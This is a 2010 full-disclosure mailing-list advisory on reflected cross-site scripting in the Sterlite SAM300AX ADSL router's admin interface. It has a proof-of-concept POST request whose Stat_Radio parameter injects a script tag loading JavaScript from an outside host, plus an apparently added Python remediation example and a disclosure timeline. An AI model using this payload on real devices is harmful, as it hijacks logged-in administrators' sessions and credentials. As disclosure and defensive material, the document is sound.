
List:       full-disclosure
Subject:    [Full-disclosure] Sterlite SAM300AX ADSL router - Cross Site
From:       Karn Ganeshen <karnganeshen () gmail ! com>
Date:       2010-02-04 19:51:58
Message-ID: a4dcca121002041139x2c1fd329o39fa2de5f03a24ed () mail ! gmail ! com

*Sterlite SAM300AX ADSL router* is provided through MTNL, New Delhi, India,
amongst other national / international locations
(www.sterlitetechnologies.com /
http://sterlitetechnologies.com/sterlite.aspx).

##########

*+About MTNL+*

http://mtnldelhi.in/glance/index.htm

MTNL was set up on 1st April, 1986 by the Government of India to upgrade the
quality of telecom services, expand the telecom network, introduce new
services and to raise revenue for telecom development needs of India’s key
metros – Delhi, the political capital and Mumbai, the business capital of
India.

Govt. of India currently holds 56.25% stake in the company.

*+Broadband device used+*

http://delhi.mtnl.net.in/services/broadband.htm

Sterlite SAM300AX ADSL router is deployed by MTNL at user's end (usually
home / small office) for internet broadband services.

*+Vulnerability+*

A. Reflected Cross Site Scripting (may also result in remote code
execution)

*+Details of Vulnerability+*

The management interface of the router is accessible through HTTP. After
logging in, we are presented with various administrative screens.

User input is not properly filtered and/or encoded by the application
before being reflected back in the response, allowing an attacker to
execute scripts in the user's browser.

*+Pre-Requisites+*
User logged on to the Router.

*+PoC+*

One of the vulnerable HTTP requests and parameters is provided below for
reference. Go to Menu -> Statistics.

*+POST Request+*

POST http://192.168.1.1/Forms/status_statistics_1 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 Paros/3.2.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/status/status_statistics.htm
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-length: 101

*+POST Parameters+*

Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH

*+Impact+*

High Impact. This device is supplied in Delhi and Mumbai through MTNL, a
Govt. of India controlled organization. As there is no filtering / encoding
in place, an attacker has the opportunity to get scripts executed by a
user who is logged on to the router (http://192.168.1.1). XSS can be used to
obtain login credentials, download malware, execute scripts from external
sources, gain access to the system and subsequently perform further serious
attacks like DoS/DDoS.

*+Solution+*

A. Sanitize / filter all input.
B. Ensure ALL Input and Output is encoded properly.
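To show what the two remedies mean for the exact parameter in the PoC, here is an added example (my code, not the vendor's firmware) that decodes a form body shaped like the advisory's request and renders the Stat_Radio value three ways: reflected verbatim (the reported behaviour), HTML-encoded at the output point (solution B), and checked against an allow-list before encoding (solution A). The allow-list values and the `<input>` markup are assumptions; the router's real page is not on the advisory.

```python
import html
from urllib.parse import parse_qs

# Constructed sample body with the same shape as the advisory's PoC request
# (a URL-encoded form post to /Forms/status_statistics_1).
SAMPLE_BODY = (
    "Stat_Radio=%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org"
    "%2Fxss.js%3E%3C%2FSCRIPT%3E&StatRefresh=REFRESH"
)

# Hypothetical allow-list of radio-button values; the real firmware's values
# are not in the advisory, so these are assumed.
ALLOWED_STAT_RADIO = ("ethernet", "adsl", "wlan")


def stat_radio(body: str) -> str:
    """Decode the form body and return the raw Stat_Radio value."""
    return parse_qs(body, keep_blank_values=True).get("Stat_Radio", [""])[0]


def render_vulnerable(body: str) -> str:
    """Reflect the parameter verbatim into the page, as the advisory describes."""
    return f'<input type="radio" name="Stat_Radio" value="{stat_radio(body)}" checked>'


def render_encoded(body: str) -> str:
    """Solution B: HTML-encode the value at the output point.

    quote=True also encodes the double quote, so the value cannot close the
    attribute it is placed in.
    """
    safe = html.escape(stat_radio(body), quote=True)
    return f'<input type="radio" name="Stat_Radio" value="{safe}" checked>'


def render_allowlisted(body: str) -> str:
    """Solution A: accept only known values; anything else falls back to the first.

    Output encoding is kept as well: input validation and output encoding
    are separate layers, and the advisory asks for both.
    """
    value = stat_radio(body)
    if value not in ALLOWED_STAT_RADIO:
        value = ALLOWED_STAT_RADIO[0]
    safe = html.escape(value, quote=True)
    return f'<input type="radio" name="Stat_Radio" value="{safe}" checked>'


def has_script_tag(markup: str) -> bool:
    """Used to check a rendering: does it still contain a live <script> tag?"""
    return "<script" in markup.lower()
```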

*+References+*
-> OWASP (www.owasp.org)

##########

*Vulnerability Found:* January 19, 2010

*Vendor First Notified:* January 20, 2010
*Vendor Response:* None

*Follow Up Notification:* January 27, 2010
*Vendor Response:* None

*Public Disclosure:* February 05, 2010

##########

Best Regards,
Karn Ganeshen
